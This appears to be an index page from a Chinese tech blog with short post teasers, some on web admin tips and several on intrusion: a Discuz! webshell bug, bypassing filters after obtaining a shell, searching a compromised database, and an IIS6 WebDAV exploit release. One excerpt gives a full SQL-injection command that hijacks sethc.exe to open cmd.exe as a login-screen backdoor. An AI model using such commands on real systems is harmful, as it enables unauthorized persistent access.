预览模式: 普通 | 列表

一款好玩的游戏(高智商)

Windows下Nginx以服务的方式运行

从wnmp发布以来,很多朋友就问Windows下如何将Nginx加入服务中,以便于服务器重启后自动运行,我在朋友的留言中回复了,可能不是很好找,便整理在此,便于需要的朋友查找。

假设nginx安装在c:\nginx\下:

1.下载微软服务注册工具srvany.exe, instsrv.exe, srvany-instsrv存放到c:\nginx\目录下

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1329

两个强制点击广告后才能下载的代码

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>中国站长天空-网页特效-综合特效-强制点击广告代码(一)</title>
<meta http-equiv="content-type" content="text/html;charset=gb2312">

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1325

批量替换mysql字段里的数据

Update ecs_goods SET goods_desc = replace(goods_desc, '(', '-') Where goods_ID=182

Update ecs_goods SET goods_desc = replace(goods_desc, ')', '') Where goods_ID=182
文件用文件替换软件替换下就可以了,数据库用如上的命令替换就可以。
文件名形式为11(1).jpg

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1325

淘宝网不支持文件名带括号的图片

如此从其他网站拷贝可视编辑过去的话如果图片带括号的话那在淘宝网上是显示不了的。
以下是编辑器fckeditor的修改方法,此编辑器上传图片的时候如果文件存在则把文件名字带个括号+标识数字。
fckeditor\editor\filemanager\connectors\php\commands.php
如下

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1325

Discuz! admindatabase.inc.php get-webshell bug

由于Discuz!的admin\database.inc.php里action=importzip解压zip文件时,导致可以得到webshell.

一 分析

在文件admin\database.inc.php里代码:

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1326

当"" 被过滤时

当你拿到shell以后 发现对方的 不知道是防火墙 还是 ids 还是 hips 或者某某山寨产品 竟然把

\ 给过滤了 ,无法路径跳转 很不方便的说

下面提供邪恶的一小段代码 以备急时所需

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1330

镜像劫持sethc.exe

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--  镜像劫持

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1325

Mssql 逆向查询

作者:oldjun & 皇子    
     非常不幸,拿到一个库,里面有几百张表,而且很多表都有N多字段,不想一个一个去手工探测有用的表和字段,写了点SQL语句,在oldjun帮忙下有了这个脚本。作用是使用一个关键字作为搜索条件,然后遍历整个数据库,回显该关键字在库中所有位置,即所处表名与列。

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1329

公开 IIS6 Webdav Exploit PHPSHELL版

By racle@tian6.com && securiteweb.org
Source:www.tian6.com && www.securiteweb.org



IIS6.0 WEBDAV 漏洞录像和相关介绍论坛都发了好几天了.milw0rm.com昨天也公开了一个C版本利用程序.他的效果我不知道,还没有使用过.
现在tian6.com国内首先公布一个脚本EXP.


其实前天就想写一份无须编译的EXP.可惜手上没有环境,构建又太麻烦,所以昨天找了个朋友,一起写完这份EXP.
已经公布

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1328